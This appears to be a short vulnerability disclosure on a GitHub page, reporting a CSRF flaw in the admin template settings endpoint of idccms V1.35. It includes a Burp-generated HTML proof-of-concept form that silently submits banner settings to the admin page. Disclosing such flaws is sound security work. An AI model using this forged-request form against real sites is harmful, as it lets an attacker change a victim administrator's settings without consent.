Skip to content

Latest commit

 

History

History
21 lines (18 loc) · 670 Bytes

1.md

File metadata and controls

21 lines (18 loc) · 670 Bytes

target:http://idccms.com/ version: V1.35

idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/tplSys_deal.php?mudi=area

POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:80/admin/tplSys_deal.php?mudi=area" method="POST">
      <input type="hidden" name="area" value="imgBanner" />
			<input type="hidden" name="isImgBanner" value="0" />
			<input type="hidden" name="imgBannerH" value="360" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>